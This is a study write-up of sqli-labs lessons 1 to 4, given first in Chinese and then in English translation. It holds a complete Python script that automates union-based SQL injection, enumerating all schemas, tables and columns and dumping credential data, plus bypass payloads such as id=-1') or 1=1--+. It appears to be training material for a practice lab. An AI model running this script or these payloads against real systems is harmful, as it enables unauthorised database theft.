sqli-lab1~4(sqli-lab1~4)

基础知识

常用函数:

version()		Mysql版本
user() 		数据库用户名
database() 	数据库名
@@datadir 	数据库安装路径
@@version_compile_os 	操作系统版本

常用查询语句:

  • 查库
select schema_name from information_schema.schemata
  • 查表
select table_name from information_schema.tables where table_schema='security' 
-- 该表名用的时候大多转为*16*进制
  • 查列
select column_name from information_schema.columns where table_name='users'
  • 查字段
select username,password from security.users
  • 查询结果按第n列排序 (用于报错注入测试有几列)
order by (n)

sql注释符:

  • #

  • --+

字符串连接函数

  • concat (str1 , str2) — 连接字符串, 无分隔符

  • concat (-/~ , str1 , str2) — 连接字符串, 有分隔符

  • group_concat (str1 , str2) — 连接字符串, 并用 ‘,’ 分隔每一个字符

字符型 数字型 搜索型 注入的区别和判断

(如题)

study 1:

首先用id=1’发现报错, 再用id=1′ or ‘1’=’1发现成功注入, 判断为字符型注入

写了个脚本, 一把梭

# coding=utf-8

import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup

url = "http://www.sqlstudy.com/sqlstudy/Less-1"  # lab target; hard-coded module global read by every request below

def CheckStatus(r_text: str) -> int:
    """Return 1 when the page body still shows the login marker, else 0.

    The lab echoes "Login name" only when the injected query succeeded,
    so the presence of that substring is the success oracle used by
    every probe in this script.
    """
    return 1 if "Login name" in r_text else 0

def PrintNameAndPswd(res_text: str) -> str:
    """Extract the "Your Login name:..." fragment from the lab's HTML.

    Locates the "Your Login name:" marker and the "Your Password:" marker
    that follows it, and cuts each fragment at the next '<' character.
    Only the login-name fragment (marker prefix included) is returned;
    the password fragment is scanned for parity with the original but
    never used. Raises ValueError if a marker is absent and IndexError if
    no '<' follows a marker.
    """
    def _run_to_tag(start: int) -> str:
        # Walk forward until the next '<'; an unbounded walk, so a marker
        # with no closing tag after it runs off the end (IndexError).
        stop = start
        while res_text[stop] != '<':
            stop += 1
        return res_text[start:stop]

    name_at = res_text.index("Your Login name:")
    pswd_at = res_text.index("Your Password:", name_at)
    login_fragment = _run_to_tag(name_at)
    _run_to_tag(pswd_at)  # result unused; kept so the failure modes match
    return login_fragment


def GetColumnsNum() -> int:
    """Binary-search the column count of the lab query using ``order by n``.

    Probes ``id=1' order by {mid}--+`` for mid within [1, 20] and treats a
    page that still contains "Login name" (CheckStatus) as "at least mid
    columns exist". When the loop ends ``left == right + 1``, so the final
    ``mid`` equals ``right``, i.e. the largest n that succeeded (0 if even
    ``order by 1`` failed), assuming the oracle is monotone in n.

    Detection note: every probe places ``order by <n>`` plus the ``--+``
    comment terminator inside the ``id`` parameter, which is the literal
    token sequence a request log or WAF rule would flag.
    """
    left = 1
    right = 20
    mid = (left + right) // 2
    while left <= right:
        payload = "id=1' order by {}--+".format(mid)
        # NOTE(review): payload is passed as a str, not a dict, and no
        # timeout is given — confirm the installed requests sends it
        # verbatim; a stalled server blocks this loop indefinitely.
        res = requests.get(url = url , params = payload)
        # print(parse.unquote(res.url))
        res_text = res.text
        if CheckStatus(res_text):
            # PrintNameAndPswd(res_text , pos_name , pos_pswd)
            left = mid + 1
        else:
            right = mid - 1
        mid = (right + left) // 2

    return mid

def HowItContrl(columnsnum: int) -> None:
    """Send one ``union select 1,2,...,n`` probe and parse the echoed page.

    Builds ``id=-1' union select 1,…,columnsnum--+`` (the trailing comma is
    stripped before ``--+`` is appended) and, if the page still shows the
    login marker, runs PrintNameAndPswd on it. That call's return value is
    discarded, so this function only serves as a manual probe; it is
    commented out in ``__main__``. The two comments below are the author's
    record of which column numbers showed up in the echoed output.
    """
    # Your Login name:2
    # Your Password:3
    payload = "id=-1' union select "
    for i in range(1 , columnsnum + 1):
        payload = payload + "{},".format(i)
    res = requests.get(url=url , params=payload.strip(",") + '--+')
    res_text = res.text
    if CheckStatus(res_text):
        PrintNameAndPswd(res_text)

def GetAllDatabase() -> str | None:
    """Return the raw "Your Login name:..." fragment listing all schema names.

    A subquery over information_schema.schemata is placed in column 2 of the
    union so the lab echoes it in the login-name slot; the caller strips
    everything up to ':' and splits on ','. Returns None when CheckStatus
    fails, which ``__main__`` does not guard against.
    """
    payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        return PrintNameAndPswd(res_text)

def WhereAmI() -> str | None:
    """Return the current database name, or None if the probe failed.

    ``database()`` is echoed in column 2; the text after the first ':' of
    the login-name fragment is returned.
    """
    payload = "id=-1' union select 1,database(),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        MyPosition = PrintNameAndPswd(res_text)
        return MyPosition[MyPosition.index(":") + 1 : ]

def GetTableName(DatabaseName: str) -> list[str] | None:
    """Return the table names of ``DatabaseName`` as a list, or None on failure.

    The schema name is inserted into the SQL with str.format and no escaping,
    so a value containing '"' would break the query; the script trusts what
    the lab echoed back. The echoed group_concat result is split on ','.
    """
    payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        TableName = PrintNameAndPswd(res_text)
        TableName = TableName[TableName.index(":") + 1 :].split(",")
        return TableName

def GetColumnName(TableName: str) -> list[str] | None:
    """Return the column names of ``TableName`` as a list, or None on failure.

    Note the lookup is by table_name only, not by schema, so tables with the
    same name in several databases have their columns merged into one list.
    TableName is formatted into the SQL without escaping.
    """
    payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        ColumnName = PrintNameAndPswd(res_text)
        ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
        return ColumnName

def GetDetails(DatabaseName: str , TableName: str , ColumnName: str) -> list[str] | None:
    """Return the values of one column as a list, or None if the probe failed.

    All three identifiers are formatted into the SQL unquoted. Values that
    themselves contain ',' are split apart, since the group_concat result is
    split on that character. Returns None when the lab page no longer shows
    the login marker (e.g. a column the current user cannot read).
    """
    payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        Details = PrintNameAndPswd(res_text)
        Details = Details[Details.index(":") + 1 :].split(",")
        return Details

if __name__ == "__main__" :
    # Driver: determine the column count, then enumerate schemas, tables,
    # columns and contents of the lab target, writing a nested report to
    # sqli-lab1.txt in the current directory (overwritten on every run).
    with open('sqli-lab1.txt' , 'w') as f:
        columnsnum = GetColumnsNum()
        f.write("column_number = " + str(columnsnum) + '\n')
        # HowItContrl(columnsnum)
        # NOTE(review): GetAllDatabase(), WhereAmI(), GetTableName() and
        # GetColumnName() all return None when CheckStatus fails; only
        # Details below is checked, so a failed probe here raises TypeError
        # on .index(), string concatenation or len().
        DatabaseName = GetAllDatabase()
        DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
        MyPosition = WhereAmI()
        f.write("You are in : " + MyPosition + '\n')
        for i in range(0,len(DatabaseName)):
            f.write("DatabaseName : " + DatabaseName[i] + '\n')
            TableName = []
            TableName = GetTableName(DatabaseName[i])
            # print(TableName)
            for j in range(0,len(TableName)):
                f.write("--TableName : " + TableName[j] + '\n')
                ColumnName = []
                ColumnName = GetColumnName(TableName[j])
                # print(ColumnName)
                for k in range(0, len(ColumnName)):
                    f.write("----ColumnName : " + ColumnName[k] + '\n')
                    Details = []
                    Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
                    # print(type(Details))
                    # Checking str(type(x)) for "NoneType" is a roundabout
                    # `Details is not None` test.
                    Details_type = str(type(Details))
                    if not "NoneType" in Details_type:
                        for l in range(0,len(Details)):
                            f.write("------Details : " + Details[l] + '\n')
                            if l == len(Details) - 1:
                                f.write("\n---------------------------------------------------------------\n\n")
                    else:
                        f.write("--------Details : NULL \n")

study 2:

发现是数字型, 用id=-1 or 1=1–+就能绕过, 然后脚本改改也能一把梭

study 3:

使用id=1’之后发现报错, 结合错误语句看出是(‘id’), 用id=-1′) or 1=1–+就能绕过, 然后改脚本一把梭

study 4:

id=1’没报错, 换成id=1″报错, 结合语句判断出是(“id”), 用id=-1″) or 1=1–+即可绕过, 改脚本梭哈

————————

Basic knowledge

Common functions:

version()		MySQL version
user() 		database user name
database() 	current database name
@@datadir 	database installation path
@@version_compile_os 	operating-system version

Common query statements:

  • List databases
select schema_name from information_schema.schemata
  • List tables
select table_name from information_schema.tables where table_schema='security' 
-- 该表名用的时候大多转为*16*进制
  • List columns
select column_name from information_schema.columns where table_name='users'
  • Query fields
select username,password from security.users
  • Sort the query results by column n (used in error-based injection testing to find how many columns there are)
order by (n)

SQL comment:

  • #
  • --+

String concatenation function

  • concat(str1, str2) — concatenates strings with no separator
  • concat(-/~, str1, str2) — concatenates strings with a separator
  • group_concat(str1, str2) — concatenates strings, separating each one with ','

Difference and judgment of character type, number type and search type injection

(as title)

study 1:

First, id=1' produces an error, and then id=1' or '1'='1 injects successfully, so this is judged to be character-type injection.

Wrote a script that does the whole thing in one go

# coding=utf-8

import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup

url = "http://www.sqlstudy.com/sqlstudy/Less-1"  # lab target; hard-coded module global read by every request below

def CheckStatus(r_text: str) -> int:
    """Return 1 when the page body still shows the login marker, else 0.

    The lab echoes "Login name" only when the injected query succeeded,
    so the presence of that substring is the success oracle used by
    every probe in this script.
    """
    return 1 if "Login name" in r_text else 0

def PrintNameAndPswd(res_text: str) -> str:
    """Extract the "Your Login name:..." fragment from the lab's HTML.

    Locates the "Your Login name:" marker and the "Your Password:" marker
    that follows it, and cuts each fragment at the next '<' character.
    Only the login-name fragment (marker prefix included) is returned;
    the password fragment is scanned for parity with the original but
    never used. Raises ValueError if a marker is absent and IndexError if
    no '<' follows a marker.
    """
    def _run_to_tag(start: int) -> str:
        # Walk forward until the next '<'; an unbounded walk, so a marker
        # with no closing tag after it runs off the end (IndexError).
        stop = start
        while res_text[stop] != '<':
            stop += 1
        return res_text[start:stop]

    name_at = res_text.index("Your Login name:")
    pswd_at = res_text.index("Your Password:", name_at)
    login_fragment = _run_to_tag(name_at)
    _run_to_tag(pswd_at)  # result unused; kept so the failure modes match
    return login_fragment


def GetColumnsNum() -> int:
    """Binary-search the column count of the lab query using ``order by n``.

    Probes ``id=1' order by {mid}--+`` for mid within [1, 20] and treats a
    page that still contains "Login name" (CheckStatus) as "at least mid
    columns exist". When the loop ends ``left == right + 1``, so the final
    ``mid`` equals ``right``, i.e. the largest n that succeeded (0 if even
    ``order by 1`` failed), assuming the oracle is monotone in n.

    Detection note: every probe places ``order by <n>`` plus the ``--+``
    comment terminator inside the ``id`` parameter, which is the literal
    token sequence a request log or WAF rule would flag.
    """
    left = 1
    right = 20
    mid = (left + right) // 2
    while left <= right:
        payload = "id=1' order by {}--+".format(mid)
        # NOTE(review): payload is passed as a str, not a dict, and no
        # timeout is given — confirm the installed requests sends it
        # verbatim; a stalled server blocks this loop indefinitely.
        res = requests.get(url = url , params = payload)
        # print(parse.unquote(res.url))
        res_text = res.text
        if CheckStatus(res_text):
            # PrintNameAndPswd(res_text , pos_name , pos_pswd)
            left = mid + 1
        else:
            right = mid - 1
        mid = (right + left) // 2

    return mid

def HowItContrl(columnsnum: int) -> None:
    """Send one ``union select 1,2,...,n`` probe and parse the echoed page.

    Builds ``id=-1' union select 1,…,columnsnum--+`` (the trailing comma is
    stripped before ``--+`` is appended) and, if the page still shows the
    login marker, runs PrintNameAndPswd on it. That call's return value is
    discarded, so this function only serves as a manual probe; it is
    commented out in ``__main__``. The two comments below are the author's
    record of which column numbers showed up in the echoed output.
    """
    # Your Login name:2
    # Your Password:3
    payload = "id=-1' union select "
    for i in range(1 , columnsnum + 1):
        payload = payload + "{},".format(i)
    res = requests.get(url=url , params=payload.strip(",") + '--+')
    res_text = res.text
    if CheckStatus(res_text):
        PrintNameAndPswd(res_text)

def GetAllDatabase() -> str | None:
    """Return the raw "Your Login name:..." fragment listing all schema names.

    A subquery over information_schema.schemata is placed in column 2 of the
    union so the lab echoes it in the login-name slot; the caller strips
    everything up to ':' and splits on ','. Returns None when CheckStatus
    fails, which ``__main__`` does not guard against.
    """
    payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        return PrintNameAndPswd(res_text)

def WhereAmI() -> str | None:
    """Return the current database name, or None if the probe failed.

    ``database()`` is echoed in column 2; the text after the first ':' of
    the login-name fragment is returned.
    """
    payload = "id=-1' union select 1,database(),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        MyPosition = PrintNameAndPswd(res_text)
        return MyPosition[MyPosition.index(":") + 1 : ]

def GetTableName(DatabaseName: str) -> list[str] | None:
    """Return the table names of ``DatabaseName`` as a list, or None on failure.

    The schema name is inserted into the SQL with str.format and no escaping,
    so a value containing '"' would break the query; the script trusts what
    the lab echoed back. The echoed group_concat result is split on ','.
    """
    payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        TableName = PrintNameAndPswd(res_text)
        TableName = TableName[TableName.index(":") + 1 :].split(",")
        return TableName

def GetColumnName(TableName: str) -> list[str] | None:
    """Return the column names of ``TableName`` as a list, or None on failure.

    Note the lookup is by table_name only, not by schema, so tables with the
    same name in several databases have their columns merged into one list.
    TableName is formatted into the SQL without escaping.
    """
    payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        ColumnName = PrintNameAndPswd(res_text)
        ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
        return ColumnName

def GetDetails(DatabaseName: str , TableName: str , ColumnName: str) -> list[str] | None:
    """Return the values of one column as a list, or None if the probe failed.

    All three identifiers are formatted into the SQL unquoted. Values that
    themselves contain ',' are split apart, since the group_concat result is
    split on that character. Returns None when the lab page no longer shows
    the login marker (e.g. a column the current user cannot read).
    """
    payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        Details = PrintNameAndPswd(res_text)
        Details = Details[Details.index(":") + 1 :].split(",")
        return Details

if __name__ == "__main__" :
    # Driver: determine the column count, then enumerate schemas, tables,
    # columns and contents of the lab target, writing a nested report to
    # sqli-lab1.txt in the current directory (overwritten on every run).
    with open('sqli-lab1.txt' , 'w') as f:
        columnsnum = GetColumnsNum()
        f.write("column_number = " + str(columnsnum) + '\n')
        # HowItContrl(columnsnum)
        # NOTE(review): GetAllDatabase(), WhereAmI(), GetTableName() and
        # GetColumnName() all return None when CheckStatus fails; only
        # Details below is checked, so a failed probe here raises TypeError
        # on .index(), string concatenation or len().
        DatabaseName = GetAllDatabase()
        DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
        MyPosition = WhereAmI()
        f.write("You are in : " + MyPosition + '\n')
        for i in range(0,len(DatabaseName)):
            f.write("DatabaseName : " + DatabaseName[i] + '\n')
            TableName = []
            TableName = GetTableName(DatabaseName[i])
            # print(TableName)
            for j in range(0,len(TableName)):
                f.write("--TableName : " + TableName[j] + '\n')
                ColumnName = []
                ColumnName = GetColumnName(TableName[j])
                # print(ColumnName)
                for k in range(0, len(ColumnName)):
                    f.write("----ColumnName : " + ColumnName[k] + '\n')
                    Details = []
                    Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
                    # print(type(Details))
                    # Checking str(type(x)) for "NoneType" is a roundabout
                    # `Details is not None` test.
                    Details_type = str(type(Details))
                    if not "NoneType" in Details_type:
                        for l in range(0,len(Details)):
                            f.write("------Details : " + Details[l] + '\n')
                            if l == len(Details) - 1:
                                f.write("\n---------------------------------------------------------------\n\n")
                    else:
                        f.write("--------Details : NULL \n")

study 2:

It turns out to be numeric-type injection: id=-1 or 1=1--+ bypasses it, and the script needs only small changes to run through everything.

study 3:

After sending id=1' an error appears; the error message shows the value is wrapped as ('id'), so id=-1') or 1=1--+ bypasses it, and the script is adjusted accordingly.

study 4:

id=1' gives no error but id=1" does; the error message shows the value is wrapped as ("id"), so id=-1") or 1=1--+ bypasses it, and the script is adjusted accordingly.